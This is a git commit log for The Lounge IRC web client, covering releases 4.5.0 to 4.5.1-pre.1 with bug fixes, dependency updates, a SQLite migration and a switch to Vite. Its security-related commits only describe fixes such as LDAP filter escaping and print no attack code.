<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoibWFzdGVyIiwibGFiZWxzIjpbIlR5cGU6IFNlY3VyaXR5Il19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
 2026-06-17 22:49:08 -07:00
Max Leiter
283b6f4dea ident: normalize ipv4-mapped addresses when comparing (#5102) 
Reported by AlexC on IRC:

> after upgrade [to 4.5.0] identd forwarding is broken

4.5.0 included 0e48014d (`ident: only respond if the ip,port tuples
match`). It correctly requires the addresses to match but the comparison
compares the IPs as strings, but an IP can have multiple variations.

A default `bind` unset ident server will look something like
`::ffff:127.0.0.1` while outgoing will be `127.0.0.1.` and those
obviously do not match in a string equality check.

closes #5101
 2026-06-17 22:48:46 -07:00
Max Leiter
aa8547f64d v4.5.1-pre.1 v4.5.1-pre.1 2026-06-14 22:51:58 -07:00
Max Leiter
253c6c63e6 Add changelog entry for v4.5.1-pre.1 2026-06-14 22:51:40 -07:00
renovate[bot]
ce7f66e259 Replace dependency npm-run-all with npm-run-all2 5.0.0 (#4830) 
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [npm-run-all](https://redirect.github.com/mysticatea/npm-run-all) →
[npm-run-all2](https://redirect.github.com/mysticatea/npm-run-all) |
devDependencies | replacement | [`4.1.5` →
`5.0.0`](https://renovatebot.com/diffs/npm/npm-run-all/4.1.5/) |

This is a special PR that replaces `npm-run-all` with the community
suggested minimal stable replacement version.

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - Between 12:00 AM and 03:59 AM, on day 1 of the month (`* 0-3 1 * *`)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/thelounge/thelounge).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy4xNTMuMiIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoibWFzdGVyIn0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
 2026-06-14 22:03:44 -07:00
Max Leiter
dc7f79fe92 sqlite: add message history index (#5107) 
Fixes #5103

Today, `getMessages()` filters by `(network, channel)` but sorts by
`time DESC, id DESC` and no index covers both (and a new one supersedes
`network_channel`). This has always been an issue but
https://github.com/thelounge/thelounge/pull/5055 made this code
synchronous which exposed it.

|  | Before | After |
|--------|--------|--------|
| history load, 5 channels (4.4M rows total, busiest 3M) | 6.9s, event
loop blocked | 80ms |
| single channel with 3M messages | 4.6s | 18ms |
| query plan | index scan + temp B-tree sort | index only |
 2026-06-14 22:02:13 -07:00
Max Leiter
6172ab2e79 readme: fix image (#5109) 
Reported by Tecnologia on IRC
 2026-06-11 21:40:58 -07:00
Max Leiter
d21c6fb088 Replace is-utf8, read-chunk dependencies with Node replacements (#5077) 
Available since node 18:
https://nodejs.org/api/buffer.html#bufferisutf8input
 2026-06-02 21:00:59 +00:00
Max Leiter
0fe011235e remove webpack, babel, mocha; switch to vite/vitest (#5064) 
```
Webpack vs Vite Build Comparison

  ┌────────────┬──────────────────────┬────────────────────┬───────────────┐
  │   Metric   │      Webpack 5       │ Vite 8 (Rolldown)  │    Change     │
  ├────────────┼──────────────────────┼────────────────────┼───────────────┤
  │ Build time │ 1,961ms (2.96s wall) │ 612ms (0.82s wall) │ 3.2x faster   │
  ├────────────┼──────────────────────┼────────────────────┼───────────────┤
  │ CPU time   │ 11.0s user           │ 1.3s user          │ 8.5x less CPU │
  └────────────┴──────────────────────┴────────────────────┴───────────────┘

  Bundle sizes (gzipped)

  ┌────────────────┬─────────┬────────┬────────┐
  │     Asset      │ Webpack │  Vite  │ Change │
  ├────────────────┼─────────┼────────┼────────┤
  │ App JS         │ 152.6K  │ 104.9K │ -31%   │
  ├────────────────┼─────────┼────────┼────────┤
  │ Vendor JS      │ 251.1K  │ 81.6K  │ -68%   │
  ├────────────────┼─────────┼────────┼────────┤
  │ Runtime JS     │ —       │ 0.5K   │ new    │
  ├────────────────┼─────────┼────────┼────────┤
  │ Total JS       │ 403.7K  │ 187.0K │ -54%   │
  ├────────────────┼─────────┼────────┼────────┤
  │ CSS            │ 12.5K   │ 11.9K  │ -5%    │
  ├────────────────┼─────────┼────────┼────────┤
  │ Total transfer │ 416.2K  │ 198.9K │ -52%   │
  └────────────────┴─────────┴────────┴────────┘

  Raw (uncompressed)

  ┌───────────────┬─────────┬──────┬────────┐
  │     Asset     │ Webpack │ Vite │ Change │
  ├───────────────┼─────────┼──────┼────────┤
  │ App JS        │ 1.3M    │ 304K │ -77%   │
  ├───────────────┼─────────┼──────┼────────┤
  │ Vendor JS     │ 1.1M    │ 236K │ -79%   │
  ├───────────────┼─────────┼──────┼────────┤
  │ CSS           │ 64K     │ 56K  │ -13%   │
  ├───────────────┼─────────┼──────┼────────┤
  │ Total public/ │ 5.1M    │ 3.4M │ -33%   │
  └───────────────┴─────────┴──────┴────────┘
```

---------

Co-authored-by: Copilot Autofix powered by AI <62310815+github-advanced-security[bot]@users.noreply.github.com>
 2026-06-01 09:02:09 -07:00
renovate[bot]
84963db2ec Lock file maintenance (#4857) 
This PR contains the following updates:

| Update | Change |
|---|---|
| lockFileMaintenance | All locks refreshed |

🔧 This Pull Request updates lock files to use the latest dependency
versions.

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - "before 4am on monday"
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/thelounge/thelounge).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy4yNjkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoibWFzdGVyIn0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
 2026-05-28 15:55:23 -07:00
Max Leiter
4ac9a3fae7 Add changelog for 4.5.0, fix changelog deduplication in generate script (#5091) 
Its time.
 2026-05-19 21:36:06 -07:00
Max Leiter
486ef754fc v4.5.0-rc.3 v4.5.0-rc.3 2026-05-12 21:06:42 -07:00
Max Leiter
c09085b23a Add changelog entry for v4.5.0-rc.3 2026-05-12 21:06:34 -07:00
Pavel Djundik
a63b7b45b7 Force generated certificate serial to be positive, use 20 bytes (#5097) 
Fixes #5096
@craftbyte
 2026-05-11 14:23:05 -07:00
Max Leiter
3ef1206f6a router: add beforeEnter for /settings to avoid rendering empty pages (#5089) 
https://github.com/thelounge/thelounge/pull/5063 hid the general tab if
it had nothing to show, but we removed the route guard. turns out, we
need it to avoid taking you to an empty settings page (reproducible on
https://demo.thelounge.chat/)

<img width="1512" height="835" alt="Screenshot 2026-04-18 at 5 16 21 PM"
src="https://github.com/user-attachments/assets/ebc4b3ab-d3f3-4bd3-ae31-b276d20db5ea"
/>
 2026-05-11 12:27:40 -07:00
Max Leiter
05382b2acc tests/coverage: ignore test/client and test/public, fix running coverage (#5085) 2026-04-20 02:43:50 -04:00
Max Leiter
5f9bde5bcf v4.5.0-rc.2 v4.5.0-rc.2 2026-04-18 16:48:44 -07:00
Max Leiter
07673626fe Add changelog entry for v4.5.0-rc.2 2026-04-18 16:48:32 -07:00
Jay2k1
0b2fc8d890 fix order of messages with identical timestamps (#5087) 
When sending a message that is too long, thelounge will split it up into
multiple PRIVMSGs. These will be saved to the sqlite database with
identical timestamps. Thelounge retrieves messages from the DB using
`ORDER BY time DESC`, which under certain circumstances causes these
messages to be loaded and displayed in the wrong order. This PR
addresses that by also ordering by id (only affects messages with
identical timestamps).

Before:
<img width="1050" height="107" alt="image"
src="https://github.com/user-attachments/assets/54fac085-a989-48fa-9538-1faecb09aa44"
/>

After:
<img width="1058" height="114" alt="image"
src="https://github.com/user-attachments/assets/0bb99db9-5a5d-481d-b799-87162d0535e8"
/>
 2026-04-18 16:35:10 -07:00
Max Leiter
4bb6420e04 fix: escape user-supplied LDAP filter value as per RFC 4515 (#5084) 
Pointed out by claude and @xPaw 

https://datatracker.ietf.org/doc/html/rfc4515#section-3

Tests written by Claude
 2026-04-18 16:13:23 -07:00
Reto
51b620c589 sqlite: don't interpolate the deletion query (#5086) 
While it was safe and not attacker controlled, it's better to be safe
than sorry. Plus it trips the scanners up
 2026-04-18 16:12:24 -07:00
Max Leiter
d5a4741279 v4.5.0-rc.1 v4.5.0-rc.1 2026-04-18 10:38:41 -07:00
Max Leiter
134dd0a8c4 Add changelog entry for v4.5.0-rc.1 2026-04-18 10:37:32 -07:00
Max Leiter
8a2dbad469 fix: fix inverted boolean check with expand & collapse (#5082) 
Introduced in
551f85ea51

If you `/expand` (or `/collapse`) and reload, the state is not persisted
as its not stored on the server. We didn't notice as the client logic is
correct.


h/t @xPaw and claude for finding
 2026-04-18 09:23:31 -07:00
Max Leiter
5b83f0ab4e chore: replace uuid package with crypto.randomUUID (#5081) 
Available since Node 15:
https://nodejs.org/docs/latest-v20.x/api/crypto.html
 2026-04-18 09:23:19 -07:00
Max Leiter
21f0e70696 fix /mute not persisting, case-insensitive channel check (#5083) 
Found by claude:

```
server/plugins/inputs/mute.ts — /mute slash command never persists. Missing client.save(). Mutes set via the command vanish on restart. The socket handler (server/server.ts:768-797) does save.

server/plugins/inputs/mute.ts:18 — /mute #Foo fails when channel was joined as #foo. Uses case-sensitive c.name === arg; IRC channel names are case-insensitive.
```
 2026-04-18 09:23:07 -07:00
Max Leiter
a9c16681e7 release.yml: try using node 24 for releases 2026-04-16 14:06:29 -07:00
Max Leiter
a113bb3f09 release.yml: allow workflow_dispatch 2026-04-16 13:57:26 -07:00
Max Leiter
6bd0ec7dba release workflow: switch to tokenless, update workflows (#5080) 
https://docs.npmjs.com/trusted-publishers
 2026-04-16 13:54:14 -07:00
Max Leiter
6fbc5d6f2c package.json: run npm pkg fix (#5079) 
From
https://github.com/thelounge/thelounge/actions/runs/24524239089/job/71689992605
 2026-04-16 10:33:33 -07:00
Max Leiter
6ef22b2b89 fix: pin release workflow to node 22 v4.5.0-pre.1 2026-04-16 10:23:41 -07:00
Max Leiter
018185d9c5 v4.5.0-pre.1 2026-04-16 10:17:06 -07:00
Max Leiter
b2c50c3120 Add changelog entry for v4.5.0-pre.1 2026-04-16 10:16:14 -07:00
Max Leiter
f39eb01cc5 changelog: fix handling now non-existent optionalDependencies (#5078) 
#5055 removed the `optionalDependencies` field
 2026-04-16 10:04:38 -07:00
Max Leiter
18662cb2bf fix: a11y labels and semantics (#5057) 
Fixes #4862, #4863, #4864, #4865, #4866


instead of using `aria-label`, we can use `data-tooltip` to avoid
duplicating their names in the a11y tree

the scroll down button looks fine:
<img width="670" height="228" alt="image"
src="https://github.com/user-attachments/assets/d1b3e7b9-1c0f-477b-a0f8-c7d96684b4f4"
/>

---------

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
Co-authored-by: copilot-swe-agent[bot] <198982749+Copilot@users.noreply.github.com>
 2026-04-16 09:50:40 -07:00
Max Leiter
45a23575c0 fix: preserve network name in sidebar after editing in public mode (fixes #4922) (#5059) 
We should only emit `network:name` to clients after we validate the
name, otherwise their state can get wonky

Fixes #4922
 2026-04-16 09:40:19 -07:00
Max Leiter
32f88e250e chore: bump caniuse/browserlist (#5075) 
```
Browserslist: caniuse-lite is outdated. Please run:
  npx update-browserslist-db@latest
  Why you should do it regularly: https://github.com/browserslist/update-db#readme
```

<details>
<summary>
Browserslist with this change:
</summary>

```
and_chr 147
and_ff 149
android 147
chrome 147
chrome 146
chrome 145
chrome 144
chrome 143
chrome 142
chrome 141
chrome 140
chrome 139
chrome 138
chrome 137
chrome 136
chrome 135
chrome 134
chrome 133
chrome 132
chrome 131
chrome 130
chrome 129
chrome 128
chrome 127
chrome 126
chrome 125
chrome 124
edge 146
edge 145
edge 144
edge 143
edge 142
edge 141
edge 140
edge 139
edge 138
edge 137
edge 136
edge 135
edge 134
edge 133
edge 132
edge 131
edge 130
edge 129
edge 128
edge 127
edge 126
edge 125
edge 124
firefox 149
firefox 148
firefox 147
firefox 146
firefox 145
firefox 144
firefox 143
firefox 142
firefox 141
firefox 140
firefox 139
firefox 138
firefox 137
firefox 136
firefox 135
firefox 134
firefox 133
firefox 132
firefox 131
firefox 130
firefox 129
firefox 128
firefox 127
firefox 126
firefox 125
firefox 102
firefox 91
ios_saf 26.4
ios_saf 26.3
ios_saf 26.2
ios_saf 26.1
ios_saf 26.0
ios_saf 18.5-18.7
ios_saf 18.4
ios_saf 18.3
ios_saf 18.2
ios_saf 18.1
ios_saf 18.0
ios_saf 17.6-17.7
ios_saf 17.5
opera 127
opera 126
opera 125
opera 124
opera 123
opera 122
opera 121
opera 120
opera 119
opera 118
opera 117
opera 116
opera 115
opera 114
opera 113
opera 112
opera 111
opera 110
safari 26.4
safari 26.3
safari 26.2
safari 26.1
safari 26.0
safari 18.5-18.7
safari 18.4
safari 18.3
safari 18.2
safari 18.1
safari 18.0
safari 17.6
safari 17.5
samsung 29
samsung 28
samsung 27
samsung 26
samsung 25
```
</details>

<details>
<summary>
Browserslist before:
</summary>

```
and_chr 126
and_ff 127
android 126
chrome 126
chrome 125
chrome 124
edge 126
edge 125
edge 124
firefox 128
firefox 127
firefox 126
firefox 125
firefox 102
firefox 91
ios_saf 17.5
opera 111
opera 110
safari 17.5
samsung 25
```
</details>
 2026-04-16 09:39:59 -07:00
Pavel Djundik
a7b4221f06 deps: downgrade @textcomplete/textarea to match @textcomplete/core (#5076) 2026-04-16 12:41:33 +03:00
Max Leiter
70f3097c39 downgrade to 10 2026-04-15 12:43:32 -07:00
Max Leiter
c5232aeb3c deps: bump @textcomplete/core to match @textcomplete/textarea 2026-04-15 12:37:05 -07:00
Max Leiter
00920b2715 chore: add .node-version to prettierignore (#5074) 
its not breaking checks or anything but it causes `pnpm lint` to return
an error code.
 2026-04-15 09:57:57 -07:00
Max Leiter
5eefc7c992 workflows: don't run on push and PR for every branch (#5066) 
<img width="1182" height="324" alt="image"
src="https://github.com/user-attachments/assets/1ee3021f-76d8-465d-a100-73cae9a0a0de"
/>

Right now we run identical workflows twice for every PR. instead, we
should run on `push` on main and on `pull_request` for everything else.
 2026-04-13 12:35:26 -07:00
Max Leiter
57a2c092ae chore: add .node-version file (#5069) 
Node version managers like `fnm` and `nvm` use this file to determine
what version of node to use by default.
 2026-04-13 12:34:56 -07:00
Pavel Djundik
223e30e51f Update build status badge URL in README.md 2026-04-13 22:33:43 +03:00
Max Leiter
2a92ec0e03 fix: hide Account settings tab on public instance, sometimes hide General (#5063) 
on public TL instances like the demo, this is what the account and
general tabs look like in Firefox:
 
| General | Account |
|--------|--------|
| <img width="600" height="auto" alt="image"
src="https://github.com/user-attachments/assets/6cb1b9a2-da93-4412-893a-e70004376705"
/> | <img width="600" height="auto" alt="image"
src="https://github.com/user-attachments/assets/429f8c1a-4b38-49b4-bb14-b3a935860aa7"
/> |

1. we should just always hide account if mode is public, its useless
2. if file uploads are off, there's nothing to show in General except
the native app install, which i figure is fine/not really necessary for
public instances (and isn't supported by Firefox, hence the blankness)
 2026-04-12 09:25:28 -07:00
Max Leiter
d33e1d4184 Remove sqlite3 dependency; use built-in node:sqlite (#5055) 
https://www.npmjs.com/package/sqlite3 is deprecated and Node 22 (#5041)
lets us use the builtin `node:sqlite` package (although it is
experimental)

most changes are a result of the native module being synchronous

relies on #5041 (now merged)

Closes https://github.com/thelounge/thelounge/issues/5033
 2026-04-12 13:30:56 +00:00
Reto Brunner
7d5834807b Merge fix/5032-pwa-cloudflare-access 2026-04-12 12:07:39 +02:00